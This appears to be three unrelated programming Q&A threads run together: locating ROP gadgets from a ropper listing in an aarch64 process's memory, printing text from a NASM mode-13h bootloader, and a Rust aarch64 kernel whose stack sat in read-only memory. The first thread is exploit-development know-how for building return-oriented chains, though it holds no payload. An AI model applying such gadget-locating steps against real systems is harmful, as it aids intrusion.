x16, x16, #0x30; br x17; 0x0000000000000668: ldr x17, [x16, #0xff8]; add x16, x16, #0xff8; br x17; 0x0000000000000694: ldr x17, [x16, #8]; add x16, x16, #8; br x17; 0x0000000000000684: ldr x17, [x16]; add x16, x16, #0; br x17; 0x00000000000007ec: ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret; 0x0000000000000798: ldr x2, [x2, #0xfe0]; cbz x2, #0x7a8; mov x16, x2; br x16; 0x0000000000000798: ldr x2, [x2, #0xfe0]; cbz x2, #0x7a8; mov x16, x2; br x16; ret; 0x00000000000008d8: ldr x3, [x21, x19, lsl #3]; mov x2, x24; add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3; 0x00000000000008e8: mov w0, w22; blr x3; 0x00000000000008e4: mov x1, x23; mov w0, w22; blr x3; 0x0000000000000764: mov x16, x1; br x16; 0x0000000000000764: mov x16, x1; br x16; ret; 0x00000000000007a0: mov x16, x2; br x16; 0x00000000000007a0: mov x16, x2; br x16; ret; 0x00000000000008dc: mov x2, x24; add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3; 0x0000000000000644: mov x29, sp; bl #0x728; ldp x29, x30, [sp], #0x10; ret; 0x0000000000000918: mov x29, sp; ldp x29, x30, [sp], #0x10; ret; 0x0000000000000880: movz w0, #0; ldp x29, x30, [sp], #0x20; ret; 0x00000000000007e4: movz w0, #0x1; strb w0, [x19, #0x48]; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret; 0x0000000000000660: stp x16, x30, [sp, #-0x10]!; adrp x16, #0x10000; ldr x17, [x16, #0xff8]; add x16, x16, #0xff8; br x17; 0x0000000000000640: stp x29, x30, [sp, #-0x10]!; mov x29, sp; bl #0x728; ldp x29, x30, [sp], #0x10; ret; 0x0000000000000914: stp x29, x30, [sp, #-0x10]!; mov x29, sp; ldp x29, x30, [sp], #0x10; ret; 0x0000000000000874: str w0, [sp, #0x1c]; str x1, [sp, #0x10]; bl #0x83c; movz w0, #0; ldp x29, x30, [sp], #0x20; ret; 0x0000000000000878: str x1, [sp, #0x10]; bl #0x83c; movz w0, #0; ldp x29, x30, [sp], #0x20; ret; 0x00000000000007e8: strb w0, [x19, #0x48]; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret; 0x000000000000067c: nop; adrp x16, #0x11000; ldr x17, [x16]; add x16, x16, #0; br x17; 0x0000000000000830: nop; ldp x29, x30, [sp], #0x20; ret; 0x0000000000000860: nop; ldp x29, x30, [sp], #0x60; ret; 0x0000000000000678: nop; nop; adrp x16, #0x11000; ldr x17, [x16]; add x16, x16, #0; br x17; 0x000000000000090c: nop; ret; 0x0000000000000650: ret; In particular i am interested in both 0x00000000000008f8 and 0x00000000000008d8 gadgets. Elf file type is DYN (Shared object file) Entry point 0x6f0 There are 9 program headers, starting at offset 64 The output of the command readelf -l to find the base address of ELF file is: Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flags Align PHDR 0x0000000000000040 0x0000000000000040 0x0000000000000040 0x00000000000001f8 0x00000000000001f8 R 0x8 INTERP 0x0000000000000238 0x0000000000000238 0x0000000000000238 0x000000000000001b 0x000000000000001b R 0x1 [Requesting program interpreter: /lib/ld-linux-aarch64.so.1] LOAD 0x0000000000000000 0x0000000000000000 0x0000000000000000 0x0000000000000adc 0x0000000000000adc R E 0x10000 LOAD 0x0000000000000db8 0x0000000000010db8 0x0000000000010db8 0x0000000000000290 0x0000000000000298 RW 0x10000 DYNAMIC 0x0000000000000dc8 0x0000000000010dc8 0x0000000000010dc8 0x00000000000001e0 0x00000000000001e0 RW 0x8 NOTE 0x0000000000000254 0x0000000000000254 0x0000000000000254 0x0000000000000044 0x0000000000000044 R 0x4 GNU_EH_FRAME 0x0000000000000960 0x0000000000000960 0x0000000000000960 0x0000000000000054 0x0000000000000054 R 0x4 GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000 0x0000000000000000 0x0000000000000000 RW 0x10 GNU_RELRO 0x0000000000000db8 0x0000000000010db8 0x0000000000010db8 0x0000000000000248 0x0000000000000248 R 0x1 Section to Segment mapping: Segment Sections... 00 01 .interp 02 .interp .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame 03 .init_array .fini_array .dynamic .got .got.plt .data .bss 04 .dynamic 05 .note.gnu.build-id .note.ABI-tag 06 .eh_frame_hdr 07 08 .init_array .fini_array .dynamic .got and the output of the info proc mappings in gdb is: Start Addr End Addr Size Offset objfile 0x5555555000 0x5555556000 0x1000 0x0 path_to _binary/binary_name 0x5555565000 0x5555566000 0x1000 0x0 path_to _binary/binary_name 0x5555566000 0x5555567000 0x1000 0x1000 path_to _binary/binary_name 0x7ff7e44000 0x7ff7fa1000 0x15d000 0x0 /usr/lib/aarch64-linux-gnu/libc-2.31.so 0x7ff7fa1000 0x7ff7fb1000 0x10000 0x15d000 /usr/lib/aarch64-linux-gnu/libc-2.31.so 0x7ff7fb1000 0x7ff7fb4000 0x3000 0x15d000 /usr/lib/aarch64-linux-gnu/libc-2.31.so 0x7ff7fb4000 0x7ff7fb7000 0x3000 0x160000 /usr/lib/aarch64-linux-gnu/libc-2.31.so 0x7ff7fb7000 0x7ff7fba000 0x3000 0x0 0x7ff7fcc000 0x7ff7fed000 0x21000 0x0 /usr/lib/aarch64-linux-gnu/ld-2.31.so 0x7ff7ff9000 0x7ff7ffb000 0x2000 0x0 0x7ff7ffb000 0x7ff7ffc000 0x1000 0x0 [vvar] 0x7ff7ffc000 0x7ff7ffd000 0x1000 0x0 [vdso] 0x7ff7ffd000 0x7ff7ffe000 0x1000 0x21000 /usr/lib/aarch64-linux-gnu/ld-2.31.so 0x7ff7ffe000 0x7ff8000000 0x2000 0x22000 /usr/lib/aarch64-linux-gnu/ld-2.31.so 0x7ffffdf000 0x8000000000 0x21000 0x0 [stack] How can i find out where the gadgets are actually loaded in memory ? Is that the issue ? What ropper is reporting ?
Your gadget is at 0x55555558f8. Ropper shows the addresses of gadgets the way the ELF header describes the memory layout of the binary. According to that header: The file contents 0x0-0xadc are to be mapped as r-x at address 0x0. The file contents 0xdb8-0x1048 are to be mapped as rw- at address 0x10db8. Account for page boundaries and you get one page mapping file offset 0x0 to address 0x0 as executable and two pages mapping file offset 0x0 to address 0x10000 as writeable. From your GDB dump, these mappings are created at 0x5555555000 and 0x5555565000 in the live process, respectively.
Bootloader with text and graphics ...howto ?( with nasm )
Below i have a code that draw 3 circles in 3 different colors.. that is fine.. but how do i addmit a text string ? Thx. I did some tests on virtualbox (windows), but no luck.. Any ideas to get it worked ?. BITS 16 ORG 100h push 0a000h ;Video memory graphics segment pop es mov ax, 0013h ;320x200#8bpp int 10h push 0Eh ;Blue push 10 ;cX push 10 ;cY push 10 ;Radius call drawFilledCircle push 02h ;Blue push 40 ;cX push 40 ;cY push 30 ;Radius call drawFilledCircle push 06h ;Blue push 140 ;cX push 100 ;cY push 70 ;Radius call drawFilledCircle ;Wait for a key xor ah, ah int 16h loc db "KERNEL IMG" .LOOP: push cx mov cx, 0x000B ; eleven character name mov si, loc ; image name to find push di rep cmpsb ; test for entry match pop di ;je LOAD_FAT pop cx add di, 0x0020 ; queue next directory entry loop .LOOP ;jmp FAILURE ;Restore text mode mov ax, 0003h int 10h ;Return mov ax, 4c00h int 21h ;Color ;cX ;cY ;R drawFilledCircle: push bp mov bp, sp sub sp, 02h mov cx, WORD [bp+04h] ;R mov ax, cx mul ax ;AX = R^2 mov WORD [bp-02h], ax ;[bp-02h] = R^2 mov ax, WORD [bp+06h] sub ax, cx ;i = cY-R mov bx, WORD [bp+08h] sub bx, cx ;j = cX-R shl cx, 1 mov dx, cx ;DX = Copy of 2R .advance_v: push cx push bx mov cx, dx .advance_h: ;Save values push bx push ax push dx ;Compute (i-y) and (j-x) sub ax, WORD [bp+06h] sub bx, WORD [bp+08h] mul ax ;Compute (i-y)^2 push ax mov ax, bx mul ax pop bx ;Compute (j-x)^2 in ax, (i-y)^2 is in bx now add ax, bx ;(j-x)^2 + (i-y)^2 cmp ax, WORD [bp-02h] ;;(j-x)^2 + (i-y)^2 <= R^2 ;Restore values before jump pop dx pop ax pop bx ja .continue ;Skip pixel if (j-x)^2 + (i-y)^2 > R^2 ;Write pixel push WORD [bp+0ah] push bx push ax call writePx .continue: ;Advance j inc bx loop .advance_h ;Advance i inc ax pop bx ;Restore j pop cx ;Restore counter loop .advance_v add sp, 02h pop bp ret 08h ;Color ;X ;Y writePx: push bp mov bp, sp push ax push bx mov bx, WORD [bp+04h] mov ax, bx shl bx, 6 shl ax, 8 add bx, ax ;320 = 256 + 64 add bx, WORD [bp+06h] mov ax, WORD [bp+08h] ;TODO: Clip mov BYTE [es:bx], al pop bx pop ax pop bp ret 06h times 510-($-$$) db 0 ; Fill the rest with zeros dw 0xAA55 ; Boot loader signature
but how do i addmit a text string ? You've decided to use the 320x200 256 colors video mode 13h. To output text you can use every BIOS function that deals with text output, just like you would do on a text video screen. This video mode uses an 8x8 font and so you can position the cursor at any of the 40x25=1000 character cells. Example of writing a red colored capital B at the center of the screen: mov dx, 0C14h ;DH=12 row, DL=20 column mov bh, 0 ;BH=0 display page mov ah, 02h ;AH=02h set cursor position function int 10h ;video BIOS interrupt mov bx, 000Ch ;BH=0 display page, BL=12 red mov ax, 0E42h ;AH=0Eh teletype function, AL=66 capital B int 10h ;video BIOS interrupt
BITS 16 [ORG 0x7C00] ;ORG 100h push 0a000h ;Video memory graphics segment pop es mov ax, 0013h ;320x200#8bpp int 10h push 0Eh ;Blue push 10 ;cX push 10 ;cY push 10 ;Radius call drawFilledCircle push 02h ;Blue push 40 ;cX push 40 ;cY push 30 ;Radius call drawFilledCircle push 06h ;Blue push 140 ;cX push 100 ;cY push 70 ;Radius call drawFilledCircle ;Wait for a key ;xor ah, ah ;int 16h main: ; Label for the start of the main program mov ax,0x0000 ; Setup the Data Segment register ; Location of data is DS:Offset mov ds,ax ; This can not be loaded directly it has to be in two steps. ; 'mov ds, 0x0000' will NOT work due to limitations on the CPU mov si, HelloWorld ; Load the string into position for the procedure. call PutStr ; Call/start the procedure ;jmp $ ; Never ending loop ; Procedures PutStr: ; Procedure label/start ; Set up the registers for the interrupt call mov ah,0x0E ; The function to display a chacter (teletype) mov bh,0x00 ; Page number mov bl,0x07 ; Normal text attribute .nextchar ; Internal label (needed to loop round for the next character) lodsb ; I think of this as LOaD String Block ; (Not sure if thats the real meaning though) ; Loads [SI] into AL and increases SI by one ; Check for end of string '0' or al,al ; Sets the zero flag if al = 0 ; (OR outputs 0's where there is a zero bit in the register) jz .return ; If the zero flag has been set go to the end of the procedure. ; Zero flag gets set when an instruction returns 0 as the answer. int 0x10 ; Run the BIOS video interrupt jmp .nextchar ; Loop back round tothe top .return ; Label at the end to jump to when complete ; ret ; Return to main program ;Wait for a key xor ah, ah int 16h push 01h ;Blue push 100 ;cX push 90 ;cY push 140 ;Radius call drawFilledCircle ;ret ; Data HelloWorld db ' WELCOME !! Press Enter ',10,10,0 loc db "KERNEL IMG" .LOOP: push cx mov cx, 0x000B ; eleven character name mov si, loc ; image name to find push di rep cmpsb ; test for entry match pop di ;je LOAD_FAT pop cx add di, 0x0020 ; queue next directory entry loop .LOOP ;jmp FAILURE ;Restore text mode mov ax, 0003h int 10h ;Return mov ax, 4c00h int 21h ;Color ;cX ;cY ;R drawFilledCircle: push bp mov bp, sp sub sp, 02h mov cx, WORD [bp+04h] ;R mov ax, cx mul ax ;AX = R^2 mov WORD [bp-02h], ax ;[bp-02h] = R^2 mov ax, WORD [bp+06h] sub ax, cx ;i = cY-R mov bx, WORD [bp+08h] sub bx, cx ;j = cX-R shl cx, 1 mov dx, cx ;DX = Copy of 2R .advance_v: push cx push bx mov cx, dx .advance_h: ;Save values push bx push ax push dx ;Compute (i-y) and (j-x) sub ax, WORD [bp+06h] sub bx, WORD [bp+08h] mul ax ;Compute (i-y)^2 push ax mov ax, bx mul ax pop bx ;Compute (j-x)^2 in ax, (i-y)^2 is in bx now add ax, bx ;(j-x)^2 + (i-y)^2 cmp ax, WORD [bp-02h] ;;(j-x)^2 + (i-y)^2 <= R^2 ;Restore values before jump pop dx pop ax pop bx ja .continue ;Skip pixel if (j-x)^2 + (i-y)^2 > R^2 ;Write pixel push WORD [bp+0ah] push bx push ax call writePx .continue: ;Advance j inc bx loop .advance_h ;Advance i inc ax pop bx ;Restore j pop cx ;Restore counter loop .advance_v add sp, 02h pop bp ret 08h ;Color ;X ;Y writePx: push bp mov bp, sp push ax push bx mov bx, WORD [bp+04h] mov ax, bx shl bx, 6 shl ax, 8 add bx, ax ;320 = 256 + 64 add bx, WORD [bp+06h] mov ax, WORD [bp+08h] ;TODO: Clip mov BYTE [es:bx], al pop bx pop ax pop bp ret 06h times 510-($-$$) db 0 ; Fill the rest with zeros dw 0xAA55 ; Boot loader signature
Rustc/LLVM generates faulty code for aarch64 with opt-level=0
I have two files which are assembled/compiled/linked into minimalistic kernel. start.s: .set CPACR_EL1_FPEN, 0b11 << 20 .set BOOT_STACK_SIZE, 8 * 1024 .global __boot_stack .global __start .global __halt .bss .align 16 __boot_stack: .fill BOOT_STACK_SIZE .text __start: /* disable FP and SIMD traps */ mov x0, #CPACR_EL1_FPEN msr cpacr_el1, x0 /* set stack */ adr x0, __boot_stack add sp, x0, #BOOT_STACK_SIZE /* call the Rust entry point */ bl __boot __halt: /* halt CPU */ wfi b __halt boot.rs: #[no_mangle] pub extern fn __boot() { unsafe { let ptr = 0x9000000 as *mut u8; *ptr = '!' as u8; } } For opt-level=3 the resulting code outputs single '!' to a serial port (as was intended). For opt-level=0 I have a strange infinite loop (e.g. '!!!!!!!!!....'). Here is the disassembled dump of the problematic code: 0000000000000000 <__kernel_begin>: 0: d2a00600 mov x0, #0x300000 // #3145728 4: d5181040 msr cpacr_el1, x0 8: 100007c0 adr x0, 100 <__boot_stack> c: 9140081f add sp, x0, #0x2, lsl #12 10: 94000003 bl 1c <__boot> 0000000000000014 <__halt>: 14: d503207f wfi 18: 17ffffff b 14 <__halt> 000000000000001c <__boot>: 1c: a9bf7bfd stp x29, x30, [sp,#-16]! 20: 910003fd mov x29, sp 24: 94000003 bl 30 <aarch64::boot::__boot::__rust_abi> 28: a8c17bfd ldp x29, x30, [sp],#16 2c: d65f03c0 ret 0000000000000030 <aarch64::boot::__boot::__rust_abi>: 30: d10043ff sub sp, sp, #0x10 34: 52a12008 mov w8, #0x9000000 // #150994944 38: 2a0803e9 mov w9, w8 3c: f90007e9 str x9, [sp,#8] 40: 52800428 mov w8, #0x21 // #33 44: 39000128 strb w8, [x9] 48: 910043ff add sp, sp, #0x10 4c: d65f03c0 ret The code is tested using qemu-system-aarch64. I don't see serious problems with it (except redundancy). Can you suggest a possible cause of such abnormal behaviour? P.S. This is the optimised version which works properly: 0000000000000000 <__kernel_begin>: 0: d2a00600 mov x0, #0x300000 // #3145728 4: d5181040 msr cpacr_el1, x0 8: 1007ffc0 adr x0, 10000 <__boot_stack> c: 9140081f add sp, x0, #0x2, lsl #12 10: 94000003 bl 1c <__boot> 0000000000000014 <__halt>: 14: d503207f wfi 18: 17ffffff b 14 <__halt> 000000000000001c <__boot>: 1c: 52a12008 mov w8, #0x9000000 // #150994944 20: 52800429 mov w9, #0x21 // #33 24: 39000109 strb w9, [x8] 28: d65f03c0 ret
I've succeeded to run the non-optimised code without abnormalities. Thanks to Notlikethat for the idea. My stack was just mapped into readonly memory. So I've just added the offset statement into my linker script (". = 1024M;") in order to make all the symbols to start from 1GiB (where RAM begins). After this modification the code started to work properly.